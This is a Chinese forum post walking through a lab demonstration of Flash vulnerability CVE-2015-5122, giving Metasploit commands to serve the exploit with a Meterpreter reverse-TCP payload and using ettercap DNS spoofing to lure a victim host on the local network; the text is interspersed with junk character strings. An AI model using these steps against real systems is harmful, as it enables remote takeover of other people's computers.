cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

( F; @5 g8 W3 _4 [ 二、cve2015-5122漏洞实例演示虚拟机 8 r' f9 o. B$ u0 c

. b; T) A$ f+ O2 U$ t& Q& U 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 8 x& W5 V4 j) v$ Z7 e+ w$ D& E

) L* Z4 h; Y& O b2 y search cve-2015-5122如图： 8 m! L8 M$ d$ b: F

) [/ R9 d+ i* N. ]6 U2 f 4 |) w `+ [, H) @4 O5 }2 n

! S, W- q7 |0 O& P, R 下面我们敲如下命令： * a+ z6 U! E& T: q! k' q

4 K9 [4 T% j( d# m& ]0 r use exploit/multi/browser/adobe_flash_opaque_background_uaf ( G( f6 D5 V* e, |# i7 A% }

/ c& {' a2 F' N( q set PAYLOAD windows/meterpreter/reverse_tcp 6 A X( S) P% C D

D. `. r' `7 }# t) X) C* \2 ` set LHOST 192.168.0.109 ; j2 Y. o, a0 `$ m

& V6 x) T! k- C5 R5 T# ^ set URIPATH / /*根目录*/ ! n( Z3 r9 s0 @( d. a. q

& J) t! d, r R | ~7 z6 [4 f) {7 s set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 b/ _0 m: k1 R- L. k1 Y: j

. f H- K, d1 O8 ^6 s set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + B8 y! c) A/ a& O1 K0 I# H

D6 e& x' j k 然后show options如图： ( p& Y/ s6 D( N7 P" M

+ V( H/ h3 Q8 Y. i6 g3 p0 Z 8 y+ y0 w& E% P5 I

! o+ ^) l; w6 P- h1 N 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
+ B% K, z8 C @% h 3 D' l1 S6 b7 f% g# `

/ p6 Q. P1 a1 X c 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 {, L$ N& i# Q0 |1 f. n

/ a$ P t- R; O7 C8 C( M. A Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 1 I8 l3 s3 |) {7 |9 j& o0 E

5 Y. C1 B- W+ S8 k# A- Y8 H1 ~6 V ; C& p+ ?9 j; {

p! q# r4 ]+ k/ L9 a8 e 成功了，这时候我们断开ettercap，如图： / w6 f" V# E. g9 X! w/ ]; s

5 x8 H. y9 r! \# v9 s0 n3 m1 e ( R# M1 ^/ J2 T0 s

+ P# U* D9 L( G8 \2 ^. Q Screenshot如图： * h% B1 O- M, x- k8 U+ [

- ^. N! y9 ^7 c q0 |* c9 D, V ; v6 e7 X" A% s* Q

0 J: n; v0 E; N" t+ \ * D8 ^* f$ X" P+ n

		自动登录	找回密码
密码			立即注册